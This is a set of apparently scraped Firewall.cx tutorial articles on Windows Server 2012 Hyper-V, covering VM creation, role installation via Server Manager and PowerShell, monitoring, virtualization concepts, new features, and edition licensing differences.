Next, choose to create a virtual hard disk and specify the size. We allocated a 60 GB disk size for our Windows 8.1 installation. When ready, click Next:

Hyper-V Configuring Virtual Hard Disk

One of the great benefits with virtual machines is that we can proceed with the installation of the new operating system using and ISO image, rather than a CD/DVD.

Browse to the selected ISO image and click the Next button. The virtual machine will try to boot from the selected ISO disk when it starts, so it is important to ensure the ISO image is bootable:

Hyper-V Installing VM from ISO Image

The last step allows us to review the virtual machine’s configuration summary. When ready click the Finish button:

Hyper-V VM Summary Installation

Install Windows 8.1 Guest Operating System In Hyper-V Virtual Machine

With the configuration of our virtual machine complete, it’s time to power on our virtual machine and install the operating system. Open Hyper-V Manager, and under the Virtual Machines section double-click the virtual machine created earlier. Click on the start button from the Action Menu to power on the virtual machine:

Hyper-V Starting a VM Machine

After the virtual machine completes its startup process, press any key to boot from the Windows 8.1 disk (ISO media) we configured previously. The Windows 8 installation screen will appear in a couple of seconds. Click Next followed by the Install Now button to begin the installation of Windows operating system on the virtual machine:

Hyper-V Begin Windows 8 VM installation

After accepting the End User License Agreement (EULA) we can continue our post-installation setup by configuring the hard disk. Windows will then begin its installation and update the screen as it progresses. Finally, once the installation is complete, we are presented with the Personalization screen and finally, the Start Screen:

Hyper-V VM Windows8 Start Screen

After the operating system installation and configuration is complete, it is important to proceed with the installation of Integration Services.

Integration Services on Hyper-V is what VM Tools is for VMware. Integration Services will help significantly enhance the VM’s guest operating system performance, allow file copy from the host machine to the guest machine easily, time synchronization between host and guest machines, improve management of the VM by replacing the generic operating system drivers for the mouse, keyboard, video card, network and SCSI controller components.

Other services offered by Integration Services are:

  • Backup (Volume Snapshot)
  • Virtual Machine Connection Enhancements
  • Hyper-V Shutdown Service
  • Data Exchange

 To proceed with the installation of Integration Services, Go to the Virtual Machine’s console, selection Action, and click Insert Integration Services Setup Disk as shown below:

Hyper-V Host Intergration Services installation

In the Upgrade Hyper-V Integration Services dialog box, click OK and when prompted, click Yes to restart the virtual machine.  Using the Hyper-V Manager console, administrators can keep track of all VM's installed along side with their CPU Usage, Assigned memory and uptime:

Hyper-V Manager - VM Status

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

This completes our article covering the installation of a Virtual Machine within Hyper-V and setup of Integration Services. Additional Windows 2012 Server and Hyper-V technical articles can be found in our Windows 2012 Server section.

 

  • Hits: 22098

How to Install Windows 2012 Hyper-V via Server Manager & Windows PowerShell. Monitoring Hyper-V Virtual Machines

Our previous article covered the basic concepts of Virtualization and Windows Server 2012 Hyper-V.  This article takes a closer look at Microsoft’s Hyper-V Virtualization platform and continues with the installation of the Hyper-V role via the Windows Server Manager interface and Windows PowerShell command prompt.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Hyper-V is a server role used to create virtualized environment by deploying different types of virtualization technologies such as server virtualization, network virtualization and desktop virtualization. The Hyper-V Server role can be installed in Server 2012 R2 Standard, Datacenter or Essentials edition. Hyper-V version 3.0 is the latest version of Hyper V server available in Windows Server 2012 R2 versions. Additional Windows 2012 Server and Hyper-V technical articles can be found in our Windows 2012 Server section.

To learn more about the licensing restrictions on each Windows Server 2012 edition, read our article Windows 2012 Server Foundation, Essential, Standard & Datacenter Edition Differences, Licensing & Supported Features. 

Hyper-V Hardware Requirements

The Hyper-V server role requires specific system-hardware requirements to be met. The minimum hardware requirements are listed in the table below:

Hardware

Minimum Requirements

Processor

  • 1.4Ghz 64-bit with hardware assisted virtualization. Available in processors that include a virtualization option—specifically, Intel Virtualization Technology (Intel VT) or AMD Virtualization (AMD-V)
  • Hardware-enforced Data Execution Prevention (DEP) must be available and enabled. Specifically, you must enable the Intel XD bit (execute disable bit) or AMD NX bit (no execute bit).

Memory

512 MB

Network Adapter

At least one Gigabit Ethernet adapter

Disk Space

32 GB

Keep in mind that the above table specifies the minimum requirements. If you wanted to install Hyper-V in a production environment along with a number of virtual machines, you will definitely need more than 512MB memory and 32GB disk space.

Click here for Windows Server 2016 Hyper-V Requirements

Installing The Hyper-V Server Role In Server 2012 Using Server Manager

In Windows Server 2012, you can install Hyper-V server role by using the Server Manager (GUI) or windows PowerShell. In both cases, the installation requires the user to be an Administrator or member of Administrators or Hyper-V administrators group.

At first, open Server Manager. Click Manage and select the Add Roles and Features option:

windows-2012-hyper-v-install-config-1Add Role and Features

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Click Next on the Before you begin page.

Choose Role-based or feature-based Installation option and click Next button:

windows-2012-hyper-v-install-config-2
 Choose Role-based or feature-based Installation

In the next window, click on Select a server from the server pool option and select the server where you would like to install the Hyper-V server role. Click on Next after selecting the server:

windows-2012-hyper-v-install-config-3
 Select the Destination Server to Install Hyper-V

The next screen lists the available roles for installation, check Hyper-V and click Next:

windows-2012-hyper-v-install-config-4
Selecting the Hyper-V Role for Installation

Read the Hyper-V role information and click the Next button:

windows-2012-hyper-v-install-config-5
 Hyper -V Installation

The next step involves the creation of Virtual Switches. Choose your server’s physical network adapters that will take part in the virtualization:

windows-2012-hyper-v-install-config-6
Creating Your Virtual Switches

The selected physical network adapters (in case you have more than one available) will be used and shared by virtual machines to communicate with the physical network. After selecting the appropriate network adaptors, click Next to proceed to the Migration screen.

Under Migration, leave the default settings as is and click Next:

windows-2012-hyper-v-install-config-7
Leave Default Migration Settings

These settings can also be modified later on. Live Migration is similar to VMware’s vMotion, allowing the real-time migration of virtual machines to another physical host (server).

Under Default Stores, you can configure the location of hard disk files and configuration files of all virtual machines. This is a location where all the virtual machine data will reside. You can also configure a SMB shared folder (Windows network folder), local drive or even a shared storage device.

We will leave the settings to their default location and click the Next button.

windows-2012-hyper-v-install-config-8
Selecting a Location to Store the Virtual Machines

The final screen allows us to review our configuration and proceed with the installation by clicking on the Install button:

windows-2012-hyper-v-install-config-9
Hyper-V Installation Confirmation

 Windows will now immediately begin the installation of the Hyper-V role and continuously update the installation window as shown below.

windows-2012-hyper-v-install-config-10
Hyper-V Installation Progress

Once the installation of Hyper-V is complete, the Windows server will restart.

Installing Hyper-V Role Using Windows PowerShell

The second way to install the Hyper-V role is via Windows PowerShell. Surprisingly enough, the installation is initiated with a single command.

Type the following cmdlet in PowerShell to install the Hyper-V server role your Windows Server 2012:

C:\Users\Administrator> Install-WindowsFeature  –Name Hyper-V  –IncludeManagementTools  –Restart

windows-2012-hyper-v-install-config-11-large 
Hyper-V Installation with PowerShell   

To install Hyper-V server role on remote computer, include the -ComputerName switch.  In our example, the remote computer was named Voyager:

C:\Users\Administrator> Install-WindowsFeature –Name Hyper-V –ComputerName Voyager –IncludeManagementTools –Restart

Once the installation is complete, the server will restart. Once the server has booted, you can open Hyper-V Server Manager and begin creating the virtual machines:

windows-2012-hyper-v-install-config-12
Hyper-V Manager

Monitoring Of Hyper-V Virtual Machines

When working in a virtualization environment, it is extremely important to keep an eye on virtualization service and ensure everything is running smoothly.

Thankfully, Microsoft provides an easy way to monitor Hyper-V elements and take action before things get to a critical stage.

The Hyper-V Manager console allows you to monitor processor, memory, networking, storage and overall health of the Hyper-V server and its virtual machines, while other Hyper-V monitoring metrics are accessible through Task Manager, Resource Monitor, Performance Monitor and Event Viewer to monitor different parameters of Hyper-V server.

The screenshot below shows the Hyper-V Manager with one virtual machine installed.  At a first glance, we can view the VM’s state, CPU Usage, Assigned Memory and Uptime:

windows-2012-hyper-v-install-config-13-large
View Virtual Machine Status

Under Window’s Event Viewer we’ll find a number of advanced logs that provide a deeper view of the various Hyper-V components, as shown below:

windows-2012-hyper-v-install-config-14
Hyper-V Events (click to enlarge)

Addition information on Hyper-V can be obtained through the usage of Window’s Performance Monitor, which provides a number of Hyper-V useful counters as shown below:

windows-2012-hyper-v-install-config-15
Hyper-V Performance Monitor

Most experienced virtualization administrators will agree that managing and monitoring a virtualization environment can be a full-time job. It is very important to ensure your virtualization strategy is well planned and VMs are hosted on servers with plenty of resources such as Physical CPUs, RAM and Disk storage space, to ensure they are not starved of these resources during periods of high-utilization.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Keeping an eye on Hyper-V’s Manager, Performance Monitor counters and Event Viewer will help make sure no critical errors or problems go without notice.

  • Hits: 35603

Introduction To Windows Server 2012 R2 Virtualization - Understanding Hyper-V Concepts, Virtual Deployment Infrastructure (VDI) and more

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Virtualization is an abstraction layer that creates separate distinct virtual environments allowing the operation of different operating systems, desktops and applications under the same or combined pool of resources.   In the past couple of years, virtualization has gained an incredible rate of adoption as companies consolidate their existing server and network infrastructure, in hope to create a more efficient infrastructure that can keep up with their growing needs while at the same time keep the running and administration costs as low as possible.   

Our readers can visit our dedicated Windows Server 2012 Server section to read more on Windows Hyper-V Virtualization and Windows Server 2012 technical articles.

When we hear the word ‘Virtualization’, most think about ‘server virtualization’ – which of course is the most widely applied scenario, however today the term virtualization also applies to a number of concepts including:

  • Server virtualization: - Server virtualization allows multiple operating systems to be installed on top of single physical server.
  • Desktop virtualization: - Desktop virtualization allows deployment of multiple instances of virtual desktops to users through the LAN network or Internet. Users can access virtual desktops by using thin clients, laptops, or tablets.
  • Network virtualization: - Network virtualization also known as Software Defined Networking (SDN) is a software version of network technologies like switches, routers, and firewalls. The SDN makes intelligent decisions while the physical networking device forwards traffic.
  • Application virtualization: - Application virtualization allows an application to be streamed to many desktop users. Hosted application virtualization allows the users to access applications from their local computers that are physically running on a server somewhere else on the network.

This article will be focusing on the Server virtualization platform, which is currently the most active segment of the virtualization industry.  As noted previously, with server virtualization a physical machine is divided into many virtual servers – each virtual server having its own operating system.  The core element of server virtualization is the Hypervisor – a thin layer of software that sits between the hardware layer and the multiple operating systems (virtual servers) that run on the physical machine.

The Hypervisor provides the virtual CPUs, memory and other components and intercepts virtual servers requests to the hardware. Currently, there are two types of Hypervisors:

Type 1 Hypervisor – This is the type of hypervisor used for bare-metal servers. These hypervisors run directly on the physical server’s hardware and the operating systems run on top of it. Examples of Type-1 Hypervisors are Microsoft’s Hyper-V, VMware ESX, Citrix XenServer.

Type 2 Hypervisor – This is the type of hypervisor that runs on top of existing operating systems. Examples of Type-2 Hypervisors are VMware Workstation, SWSoft’s Parallels Desktop and others.

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Microsoft Server Virtualization – Hyper-V Basics

Microsoft introduced its server virtualization platform Hyper-V with the release of Windows Server 2008. Hyper-V is a server role that can be installed from Server Manager or PowerShell in Windows Server 2012.

With the release of Windows Server 2012 and Windows Server 2012 R2, Microsoft has made lot of improvements in their Hyper-V virtualization platform. Features like live migration, dynamic memory, network virtualization, remoteFX, Hyper-V Replica, etc. have been added to new Hyper-V 3.0 in Server 2012.

Hyper-V is a type 1 hypervisor that operates right above the hardware layer. The Windows Server 2012 operating system remains above the hypervisor layer, despite the fact the Hyper-V role is installed from within the Windows Server operating system. The physical server where Hypervisor or Hyper-V server role is installed is called the host machine or virtualization server. Similarly, the virtual machines installed on Hyper-V are called guest machines.

Understanding Traditional vs Modern Server Deployment Models

Let’s take a look at the traditional way of server configuration. The figure below shows the typical traditional server deployment scenario where one server per application model is applied. In this deployment model, each application has its own dedicated physical server.

windows-hyper-v-concepts-vdi-1Traditional Server Deployment

This traditional model of server deployment has many disadvantages such as increased setup costs, management & backup overhead, increased physical space and power requirements, plus many more. Resource utilization of this type of server consolidation is usually below 10%.  Practically, this means that we have 5 underutilized servers.

Virtualization comes to dramatically change the above scenario.

Using Microsoft’s Windows Server 2012 along with the Hyper-V role installed, our traditional server deployment model is transformed into a single physical server with a generous amount of resources (CPU, Memory, Storage space, etc) ready to undertake the load of all virtual servers.

The figure below shows how the traditional model of server deployment is now virtualized with Microsoft’s Hyper-V server:

windows-hyper-v-concepts-vdi-2Hyper-V Server Consolidation

As shown in the figure above, all the five servers are now virtualized into single physical server. It is important to note that even though these virtual machines run on top of the same hardware platform, each virtual server is completely isolated from other virtual machines.

There are many benefits of this type of virtualized server consolidation. A few important benefits are reduced management overhead, faster server deployment, efficient resource utilization, reduced power consumption and so on.

Network Virtualization With Hyper-V

With the power of network virtualization you can create multi-tenant environment and assign virtual machines or group of virtual machines to different organizations or different departments. In a traditional network, you would simply create different VLANs on physical switches to isolate them from the rest of the network(s). Likewise, in Hyper-V, you can also create VLANs and virtual switches to isolate them from the network in the same way.

Readers can also refer to our VLAN section that analyses the concept of VLANs and their characteristics.

For example, you can configure a group of virtual machines on the 192.168.1.0/24 subnet and other group of virtual machines on 192.168.2.0/24 subnet.

windows-hyper-v-concepts-vdi-3Hyper-V Networking

Each virtual machine can have more than one virtual network adapter assigned to it. Like regular physical network adapters, the virtual network adapters can be configured with IP addresses, MAC addresses, NIC teaming and so on. These virtual network adapters are connected to a virtual switch. A Virtual switch is a software version of physical switch that is capable of forwarding traffic, VLAN traffic, and so on. The virtual switch is created from within the Hyper-V Manager and is then connected to one or more available physical network adapters of the host machine. The physical network adapters on the host machine are then connected to physical switch on the network.

As shown in figure 1.3, three VLANs are created under same virtual switch. The host is then connected to the physical switch by usually combining the multiple physical network cards into one also called LAG (Link Aggregation Group) or EtherChannel (Cisco’s implementation of LAG) interface. LAG or EtherChannel combines the speed of both physical network adapters.  If for example we have two 1Gbps physical network cards, with the use of LAG or EtherChannel, these are combine into a single 2Gbps network card.

 Microsoft’s Hyper-V supports the creation of three different types of virtual switches:

  1. Internal: - The internal virtual switch can communicate only between virtual machines.  A common example is a cluster based system where virtual servers connect with each other through a dedicated network connection. Internal virtual switches do not connect to the physical network infrastructure (e.g switches).
  2. External: - The external virtual switch can communicate directly with the physical network infrastructure. The virtual switch is used to for the seamless communication between the virtual machines and the physical network.
  3. Private: - The private virtual switch can communicate between virtual machines and the physical host only (physical hardware server).
FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Virtual Deployment Infrastructure (VDI) Deployment With Hyper-V

VDI is a new way of delivering desktops to end users. In VDI, virtual desktops are hosted centrally as virtual machines and are provided or streamed to users via the network or Internet using Remote Desktop Protocol (RDP) service. These virtual desktops can be used or accessed by users with different types of devices like, PCs, laptops, tablets, smart phones, thin clients, and so on. VDI have created a new hype of Bring Your Own Device (BYOD) concept. With BYOD policy implemented in the organization, users can bring their own devices like laptops, tablets, etc. and the company delivers the required virtual desktop via the network infrastructure.

VDI is an upcoming trend that offers many advantages such as:

  • Central management and control
  • Low cost since there is no need of desktop PCs. Alternate devices such as thin clients usually preferred
  • Low power consumption. Tablets, thin clients, laptops require low power compared to traditional desktop or tower PCs
  • Faster desktop deployments
  • More efficient backup

VDI is fully supported and can be implemented in Windows Server 2012 by installing Remote Desktop Services server role and configuring the virtualization host. You can create virtual machines running Windows XP/7/8 and easily assign the virtual machines to users.

We’ve covered a few of the important virtualization features deployable with Windows Server 2012 and Hyper-V, that allow organizations to consolidate their server, network and desktop infrastructure, into a more efficient model. 

Our readers can visit our dedicated Windows Server 2012 Server section to read more on Windows Hyper-V Virtualization and Windows Server 2012 offerings.

  • Hits: 57661

New Features in Windows Server 2012 - Why Upgrade to Windows 2012

There is no doubt that Cloud Computing is hot topic these days. Innovations in cloud computing models have made every industry and company IT departments to re-think their traditional model of computing. Realizing the benefits and challenges of cloud computing, Microsoft have jumped into the game of Cloud computing by releasing a cloud optimized server operating system called Windows Server 2012.

Windows Server 2012 has dozens of new features and services that makes it cloud ready. Windows Server 2012 R2 is the latest version of server operating system from Microsoft and successor of Server 2012. For more technical articles on Windows 2012 Server and Hyper-V Virtualization, visit ourWindows 2012 Server section.

Lets take a look at some of the new features Windows Server 2012 now supports:

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Windows Server Manager

Server Manager is one of the major changes of Windows Server 2012. With a new ‘look and feel’ of the Server Manager user interface, administrators now have the option to group multiple servers on their network and manage them centrally – a useful feature that will save valuable time. With this grouping feature, monitoring events, services, installed roles, performance, on multiple servers from a single window is easy, fast and requires very little effort.

windows-2012-features-1

Figure 1. Windows Server 2012 - Server Manager Dashboard (click to enlarge)

Similar to the Server Manager of previous version of windows servers, it can be used to install in Windows Server 2012 to install server roles and features.

Windows PowerShell 3.0

PowerShell 3.0 is another important improvement in Windows Server 2012. PowerShell is a command line and scripting tool designed to stretch greater control of window servers. The graphical user interface (GUI) of Windows Server 2012 is built on top of PowerShell 3.0. When you click buttons in GUI interface, PowerShell cmdlets & scripts are actually running in the background ‘translating’ mouse button commands to executable commands and scripts.

PowerShell scripts allow more tasks to be executed faster and within a short period of time, since the absence of the GUI interface means less crashes and problems.

windows-2012-features-2Figure 2. Windows Server 2012 PowerShell

Hundreds of PowerShell cmdlets have been added to Windows Server 2012 and we expect a lot more to be added in the near future, expanding their functionality and providing a new faster and more stable way to administer a Windows Server 2012.

Hyper-V 3.0

Similar to  VMware’s ESXi hypervisor, Hyper-V is Microsoft’s offering of a virtualization platform. This important feature allows to run many instances of virtual machines on single physical Windows Server 2012. Hyper-V features such as live migration, dynamic memory, network virtualization, remoteFX, Hyper-V Replica, etc. have made the Hyper-V platform more competitive against other alternatives.

The screenshot below shows the Hyper-V Manager console:

windows-2012-features-3Figure 3. Windows Server 2012 - Hyper-V Manager (click to enlarge)

When combined with Microsoft’s System Center, Windows Hyper-V becomes much more powerful and a very competitive solution that can even support private or public clouds.

Hyper-V Replica

Windows Server 2012 Hyper-V roles introduces a new capability – Hyper-V Replica - a feature many administrators will welcome.

This new feature allows the asynchronous replication of selected VMs to a backup replica server.  On the local LAN, it means you get a full backup copy of your VMs to another hardware server, while on a WAN scale this can also be extended to backup VMs to a designated replicate site across a WAN infrastructure. Common examples of WAN backup replication are disaster recovery sites. The replication cycle has a minimum setting of 15 minute gaps between every replication. This means the backup VM will be 15 minutes behind its source - the primary VM. 

When installed, Hyper-V Replica creates a snapshot of whole server, which usually requires a lot of time depending on the amount of data, and from there on, only changes are replicated. 

Server Message Block (SMB) 3.0

SMB is a file sharing protocol used in windows servers. In Windows Server 2012, SMB is now up to version 3.0 with new interesting features such as support for deduplication, hot pluggable interfaces, multichannel, encryption, Volume Shadow Copy Service (VSS) for shared files, and many more.

In addition, Hyper-V’s Virtual Hard Disk (VHD) files and virtual machines can also be hosted on shared folders. This allows the effective usage of shared folders, ensuring you make the most out of all available resources.

Dynamic Access Control (DAC)

DAC is a central management system used to manage security permissions of files and folders.  In a nutshell, DAC is new and flexible way of setting up permission on files and folders. With DAC, an administrator can now classify the data according to user claims, device claims and resource properties. Once data is classified, you can setup the permissions to control user access to the classified data.

Storage Space

Storage Space is also another new feature of Windows Server 2012. This new feature pools different physical disks together and divides them into different spaces. These spaces are then used like regular disks. In the storage pool control panel (shown below), you can add any type or size of physical disks (e.g SSD, SCSI, SATA etc).  You can also configure mirroring, raid redundancy and more.

Likewise, you can add storage at any time and the new space will be automatically available for use in storage space. Provisioning is also supported in Storage Space, allowing you to specify whether the new space be thin provisioned or thick. With thin provisioning, disk space is incremented automatically on a “as needed” basis, eliminating the need of occupying unnecessary disk space. 

windows-2012-features-4-large Figure 4. Windows Server 2012 - Storage Space

Following are pointers on the main features provided by Storage Space:

  • Obtain and easily manage reliable and scalable storage with reduced cost
  • Aggregate individual drives into storage pools that are managed as a single entity
  • Utilize simple inexpensive storage with or without external storage
  • Provision storage as needed from pools of storage you’ve created
  • Grow storage pools on demand
  • Use PowerShell to manage Storage Spaces for Windows 8 clients or Windows Server 2012
  • Delegate administration by specific pool
  • Use diverse types of storage in the same pool: SATA, SAS, USB, SCSI
  • Use existing tools for backup/restore as well as VSS for snapshots
  • Designate specific drives as hot spares
  • Automatic repair for pools containing hot spares with sufficient storage capacity to cover what was lost
  • Management can be local, remote, through MMC, or PowerShell

DirectAccess

DirectAccess is Microsoft’s answer to VPN connectivity, allowing remote clients to access your network under an encrypted connection.  Thanks to its easy installation and improved friendly interface, administrators are able to quickly setup and manage VPN services on their Windows Server 2012 system. 

DirectAccess supports SSL (WebVPN) and IPSec protocols for VPN connections. A very interesting feature is the ‘Permanent VPN’ which allows mobile users to establish their VPN initially and then place it ‘on hold’ when their internet connectivity is lost.  The VPN session will then automatically resume once the user has Internet access again. 

This time-saving feature ensures VPN users experience a seamlessly VPN connection to the office without the frustration of login in every time Internet connectivity is lost, while also allowing the automation of other tasks in the background (e.g Remote backup of files).

Data Deduplication

Data Deduplication is a specialized data compression technique for eliminating duplicate copies of repeating data.  In the deduplication process, unique chunks of data, or byte patterns, are identified and stored during a process of analysis. As the analysis continues, other chunks are compared to the stored copy and whenever a match occurs, the redundant chunk is replaced with a small reference that points to the stored chunk. 

We should note that Data Deduplication is not only a Windows 2012 Server feature, but a technology supported by many vendors such as EMC, NetApp, Symantec and others.

Window-less Interface: CLI Only-Mode

Microsoft now supports Windows Server 2012 without a graphical user interface (GUI). This means you can install and configure a Windows Server 2012 with GUI and after finishing the setup, remove the GUI completely!  You also have the option to install the Windows Server 2012 with GUI or without GUI.

Running your server without a GUI interface will help save valuable resources and also increase the system’s stability.

IP Address Management (IPAM)

IPAM is a central IP address management tool of your entire network. IPAM can work with DNS and DHCP to better allocate, discover, issue, lease and renew IP addresses. IPAM gives a central view of where IP addresses are being used within your network.

Resilient File System (ReFS)

ReFS is Microsoft’s latest file system capable of replacing the well-known NTFS file system. The main advantage of ReFS is automatic error correction (verify and auto-corect process) regardless of the underlying hardware. ReFS uses checksum to detect and correct errors. The ReFS file system has the ability to support a maximum file size of 16 Exabytes (16.7 Million TBytes!) and a maximum volume size of 1 Yottabyte (1.1 Trilion TBytes)

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Summary

Undoubtedly Windows Server 2012 is packed with new features and additions, designed to help organizations take advantages of cost optimizing features like Hyper V, Storage Spaces, PowerShell 3.0, Data Deduplication, SMB 3.0, new Server Manager and others. Microsoft has also simplified the licensing schemes and introduced  four editions of Server 2012. These are Foundation, Essentials, Standard and Datacenter edition. Follow this link to read our article covering Windows 2012 Server editions and licensing requirements.

 

  • Hits: 22788

Windows 2012 Server Foundation, Essential, Standard & Datacenter Edition Differences, Licensing & Supported Features.

FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Windows Server 2012 Editions

windows-2012On the 1st of August, 2012 Microsoft released Windows Server 2012– the sixth release of the Windows Server product family. On May 21st 2013, Windows Server 2012 R2 was introduced and is now the latest version of Windows Server in the market.  Microsoft has released four different editions of Windows Server 2012 varying in cost, licensing and features. These four editions of Windows Server 2012 R2 are: Windows 2012 Foundation edition, Windows 2012 Essentials edition, Windows 2012 Standard edition and Windows 2012 Datacenter edition.

Let’s take a closer look at each Windows Server 2012 edition and what they have to offer.

Users can also download the free Windows Server 2012 R2 Licensing Datasheet in our Windows Server Datasheets & Useful Resources download section, which provides a detailed overview of the Licensing for Windows Server 2012 and contains extremly useful information on the various Windows Server 2012 edition, examples on how to calculate your licensing needs, Virtualization instances supported by every edition,  server roles, common questions & answers, plus much more.

More technical articles covering Windows 2012 Server and Hyper-V Virtualization are available in our Windows 2012 Server section.

Windows Server 2012 Foundation Edition

This edition of Windows Server 2012 is targeted towards small businesses of up to 15 users. The Windows Server 2012 R2 Foundation edition comes pre-installed on hardware server with single physical processor and up to 32GB of DRAM memory. Foundation edition can be implemented in environments where features such as file sharing, printer sharing, security and remote access are required. Advanced server features such as Hyper V, RODC (Read Only Domain Controller), data deduplication, dynamic memory, IPAM (IP Address Management), server core, certificate service role, hot add memory, windows update services and failover clustering are not available in the Foundation edition.

Windows Server 2012 Essentials Edition

The Windows Server 2012 R2 Essentials edition is the next step up, also geared towards small businesses of up to 25 users.  Windows Server 2012 R2 Essentials edition is available in retail stores around the world making it easy for businesses to install the new operating system without necessarily purchasing new hardware. Similar to the Foundation edition, the Essentials edition does not support many advanced server features, however it does provide support of features like Hyper V, dynamic memory and hot add/remove RAM.

Windows Server 2012 R2 Essentials edition can run a single instance of virtual machine on Hyper V, a feature that was not available in Windows Server 2012 Essentials (non-R2) edition. This single virtual machine instance can be Windows Server 2012 R2 Essential edition only, seriously limiting the virtualization options but allowing companies to begin exploring the benefits of the virtualization platform.

Windows Server 2012 Standard Edition

The Windows Server 2012 R2 Standard edition of windows server is used for medium to large businesses that require additional features not present in the Foundation & Essential edition. The Standard edition is able to support an unlimited amount of users, as long as the required user licenses have been purchased.

Advanced features such as certificate services role, Hyper V, RODC (Read Only Domain Controller), IPAM (IP Address Management), Data deduplication, server core, failover clustering and more, are available to Windows Server 2012 Standard edition. We should note that the Standard edition supports up to 2 Virtual Machines.

Windows Server 2012 Datacenter Edition

The Windows Server 2012 R2 Datacenter edition is the flagship product created to meet the needs of medium to large enterprises. The major difference between the Standard and Datacenter edition is that the Datacenter edition allows the creation of unlimited Virtual Machines and is therefore suitable for environments with extensive use of virtualization technology.

Before purchasing the Windows Server 2012 operating system, it is very important to understand the difference between various editions, the table below shows the difference between the four editions of Windows Server 2012:

FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

 Editions

Foundation

Essentials

Standard

Datacenter

Distribution

OEM Only

Retail, volume licensing, OEM

Retail, volume licensing, OEM

Volume licensing and OEM

Licensing Model

Per Server

Per Server

Per CPU pair + CAL/DAL

Per CPU pair + CAL/DAL

Processor Chip Limit

1

2

64

64

Memory Limit

32GB

64GB

4TB

4TB

User Limit

15

25

Unlimited

Unlimited

File Services limits

1 standalone DFS root

1 standalone DFS root

Unlimited

Unlimited

Network Policy & Access Services limits

50 RRAS connections and 10 IAS connections

250 RRAS connections, 50 IAS connections, and 2 IAS Server Groups

Unlimited

Unlimited

Remote Desktop Services limits

50 Remote Desktop Services connections

Gateway only

Unlimited

Unlimited

Virtualization rights

n/a

Either in 1 VM or 1 physical server, but not both at once

2 VMs

Unlimited

DHCP, DNS, Fax server, Printing,  IIS Services

Yes

Yes

Yes

Yes

Windows Server Update Services

No

Yes

Yes

Yes

Active Directory Services

Yes, Must be root of forest and domain

Yes, Must be root of forest and domain

Yes

Yes

Active Directory Certificate Services

Certificate Authorities only

Certificate Authorities only

Yes

Yes

Windows Powershell

Yes

Yes

Yes

Yes

Server Core mode

No

No

Yes

Yes

Hyper-V

No

No

Yes

Yes

Windows  Server 2012 Licensing - Understanding Client Access License (CAL) & Device Access License (DAL) Licensing Models

The standard and datacenter editions of Server 2012 support Client Access License (CAL) or Device Access License (DAL) licensing model. A CAL license is assigned to a user whereas a DAL license is assigned to device (computer). For example, a CAL assigned to a user, allows only that user to access the server via any device. Likewise, if a DAL is assigned to particular device, then any authenticated user using that device is allowed to access the server.

We can use a simple example to help highlight the practical differences between CAL and DAL licensing models and understand the most cost-effective approach:

Assume an environment with Windows Server 2012 R2 standard edition and a total of 50 users and 25 devices (workstations). In this case, we can purchase either 50 CAL licenses to cover the 50 users we have or alternatively 25 DAL licenses to cover the total amount of workstations that need to access the server. In this scenario, purchasing DALs is a more cost effective solution.  

If however we had 10 users with a total of 20 devices , e.g 2 devices per user (workstation & laptop), then it more be more cost effective to purchase 10 CAL licenses.

Windows Server 2012 Foundation Edition Licensing Model

Windows Server 2012 Foundation is available to OEMs (Original Equipment Manufacturers) only and therefore can only be purchased at the time of purchasing a n new hardware server. Windows 2012 Foundation edition supports up to 15 users. CALs or DALs are not required for the Foundation edition servers. In addition, Foundation edition owners cannot upgrade to other editions. The maximum number of SMB (Server Message Block or file sharing) connections to the server is 30. Similarly, maximum number of RRAS (Routing and Remote Access Service) and RDS (Remote Desktop Service) connections is 50.

Windows Server 2012 Essentials Edition Licensing Model

The Essential edition of server 2012 is available to OEMs (with the purchase of new hardware) and also at retail stores. The user limit of this server edition is 25 and device limit is 50. This means that a maximum of 25 users amongst 50 computers can access the Windows Server 2012 Essentials edition. For example, you have 20 users rotating randomly amongst 25 computers accessing the Server 2012 Essentials edition, without any problem. CALs or DALs are not required for Windows Server 2012 Essentials edition because no more than 25 users can access the server.

 A common question at this point is what if the organization expands and increases its users and computers?

 In these cases Microsoft provides an upgrade path allowing organizations to upgrade to the Windows Server 2012 Standard or Datacenter edition license and perform an in-place license transition. Once the transition is complete, the user limitation, and other features are unlocked without requiring migration or reinstallation of the server.

Companies upgrading to a higher edition of Windows 2012 Server should keep in mind that it will be necessary to purchase the required amount of CALs or DALs according to their users or devices.

Administrators will be happy to know that it is also possible to downgrade the Standard edition of Server 2012 to the Essentials edition. For example, it is possible to run Essential edition of Server 2012 as virtual machine utilizing one of two available virtual instances in Standard edition as shown in the figure below. This eliminates the needs to purchase Essential edition of Server 2012.

 FREE Hyper-V & VMware Virtualization Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

With the release of Windows Server 2012 Essentials R2, Microsoft has updated its licensing model. Unlike Windows Server 2012 Essentials (non-R2), you can now run a single instance of a virtual machine.

The Hyper-V role and Hyper-V Manager console are now included with Windows Server 2012 R2 Essentials. The server licensing rights have been expanded, allowing you to install an instance of Essentials on your physical server to run the Hyper-V role (with none of the other roles and features of the Essentials Experience installed), and a second instance of Essentials as a virtual machine (VM) on that same server with all the Essentials Experience roles and features.

Windows Server 2012 Standard Edition & Datacenter Edition Licensing Model

The license of Standard and Datacenter edition is based on sockets (CPUs) and CAL or DAL. Definition of a socket is a CPU or physical processor. Logical cores are not counted as sockets. A single license of Standard and Datacenter edition covers up to two physical processors per physical server. CAL or DAL licenses are then required so that clients/devices can access the Windows server. Standard edition allows up to 2 virtual instances while the Datacenter edition allows unlimited number of virtual instances.

